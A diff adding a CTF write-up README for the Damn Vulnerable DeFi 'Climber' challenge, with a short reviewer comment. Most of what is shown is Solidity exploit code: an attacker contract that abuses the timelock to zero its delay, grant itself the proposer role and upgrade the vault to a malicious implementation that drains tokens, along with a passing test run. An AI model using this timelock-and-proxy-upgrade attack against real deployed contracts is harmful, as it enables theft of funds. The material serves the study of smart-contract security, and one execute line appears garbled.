test/climber/README.md

```diff
@@ -0,0 +1,1034 @@
+        dataElements[3] = abi.encodeWithSignature("upgradeToAndCall(address,bytes)", address(impl), transferBytes);
+
+        timelock.schedule(targets, values, dataElements, salt);
+    }
+
+    function attack(ClimberTimelock _timelock, 
+                        ERC1967Proxy _vault, 
+                        MaliciousImpl _impl, 
+                        DamnValuableToken _token, 
+                        address _recovery) public {
+        bytes32 salt = hex"01";
+        timelock = _timelock;
+        vault = _vault;
+        impl = _impl;
+        token = _token;
+        recovery = _recovery;
+        address[] memory targets = new address[](4);
+        uint256[] memory values = new uint256[](4);
+        bytes[] memory dataElements = new bytes[](4);
+        targets[0] = address(timelock);
+        targets[1] = address(timelock);
+        targets[2] = address(this);
+        targets[3] = address(vault);
+        values[0] = 0;
+        values[1] = 0;
+        values[2] = 0;
+        values[3] = 0;
+        dataElements[0] = abi.encodeWithSignature("updateDelay(uint64)", 0);
+        dataElements[1] = abi.encodeWithSignature("grantRole(bytes32,address)", PROPOSER_ROLE, address(this));
+        dataElements[2] = abi.encodeWithSignature("attacker_fallback_selector()");
+
+        bytes memory transferBytes = abi.encodeWithSignature("malicious_transfer(address,address)", address(token), recovery);
+        dataElements[3] = abi.encodeWithSignature("upgradeToAndCall(address,bytes)", address(impl), transferBytes);
+        timelock.execute(targets, values, dataElements, salt);(targets, values, dataElements, salt);
+    }
+
+}
+```
+**MaliciousImpl.sol**:
+```solidity
+// SPDX-License-Identifier: MIT
+
+pragma solidity =0.8.25;
+
+import {DamnValuableToken} from "../../src/DamnValuableToken.sol";
+import {ClimberVault} from "../../src/climber/ClimberVault.sol";
+import {UUPSUpgradeable} from "@openzeppelin/contracts-upgradeable/proxy/utils/UUPSUpgradeable.sol";
+
+contract MaliciousImpl is UUPSUpgradeable{
+    constructor() {}
+
+    function malicious_transfer(address token, address receiver) public {
+        DamnValuableToken(token).transfer(receiver, 10_000_000e18);
+    }
+    
+    function _authorizeUpgrade(address newImplementation) internal override {}
+
+    fallback() external payable {}
+}
+```
+Run:
+```javascript
+forge test --mp test/climber/Climber.t.sol
+...
+Suite result: ok. 2 passed; 0 failed; 0 skipped; finished in 1.63ms (438.35µs CPU time)
+```
+Passed!
+## Conclusions
+1. It is important to consider the specifics of contracts during symbolic analysis. For example, the UUPS proxy implements 2 interfaces at once, which forced us to slightly change the logic of symbolic traversal of the setup.
+2. When you need to compare 2 bytes arrays symbolically - you need to be VERY CAREFUL. There are cases when two arrays encoding the same transaction but have different hashes due to padding.
```

Comment:
> There are cases when two arrays encoding the same transaction but have different hashes due to padding.

I would phrase this slightly differently: it is possible for two arrays to encode the same transaction but have different hashes because they have different lengths